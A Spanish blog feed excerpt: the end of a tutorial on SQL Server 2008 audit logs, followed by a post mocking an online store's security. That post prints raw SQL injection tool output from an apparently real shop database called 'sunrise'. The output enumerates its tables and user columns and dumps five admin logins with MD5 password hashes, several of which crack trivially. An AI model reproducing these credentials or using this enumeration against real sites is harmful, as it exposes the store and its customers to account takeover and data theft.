VISUALIZAR LOS REGISTROS DE AUDITORÍA

Los registros de auditoría pueden ser accedidos a través la opción "View Audit Logs" o a través de la bitácora de eventos de aplicaciones o de seguridad, dependiendo de dónde se especificó que se almacenaría la auditoría.

Los resultados pueden ser filtrados o inclusive hasta exportados en los siguientes formatos: log, csv y txt.

CONCLUSIÓN

La auditoría en SQL 2008 Enterprise es muy poderosa y flexible ya que permite crear auditorías a nivel de servidor o a nivel de base de datos. La configuración es sencilla ya que solo se requiere especificar donde se almacenará la auditoría (en un archivo, la bitácora de eventos de aplicaciones o la bitácora de eventos de seguridad), que objeto se desea auditar (Base de datos, Esquema, Tablas, Funciones, Procedimientos Almacenados o Vistas) y para cual Principal (entidades que pueden solicitar recursos de SQL Server).

Leido en: blogs.technet.com

VENTAS POR INTERNET? MIS POLAINAS

noreply@blogger.com (Alex Jurado) — Thu, 24 Nov 2011 06:09:00 +0000

TABLAS

Count(table_name) of information_schema.tables Where table_schema=0x73756E72697365 is 24
Table found: cargo
Table found: cart
Table found: categoria
Table found: coleccion
Table found: configuracion_compra
Table found: costo_envio
Table found: item_orden
Table found: item_pedido
Table found: moneda
Table found: orden_compra
Table found: pedido
Table found: producto
Table found: talla
Table found: tallaje
Table found: tbl_cart
Table found: tbl_category
Table found: tbl_costo_envio
Table found: tbl_currency
Table found: tbl_order
Table found: tbl_order_item
Table found: tbl_product
Table found: tbl_shop_config
Table found: tbl_user
Table found: user_sunrise

COLUMNAS

Count(column_name) of information_schema.columns Where table_schema=0x73756E72697365 AND table_name=0x757365725F73756E72697365 is 8
Column found: codigo
Column found: nombres
Column found: apellidos
Column found: login
Column found: passw
Column found: fecha_creacion
Column found: ultima_logiada
Column found: cargo

REGISTROS

Count(*) of sunrise.user_sunrise is 5
Data Found: login=a
Data Found: passw=21232f297a57a5a743894a0e4a801fc3

Data Found: login=admin
Data Found: passw=5d88365b1893e60e28794e7e6c19c55d

Data Found: login=greenday
Data Found: passw=0cc175b9c0f1b6a831c399e269772661

Data Found: login=mercadeo
Data Found: passw=80735228c8e9b43410f2b207f0e54fb0

Data Found: login=webmaster
Data Found: passw=009c5a054c0cb6c14a194de438ee5552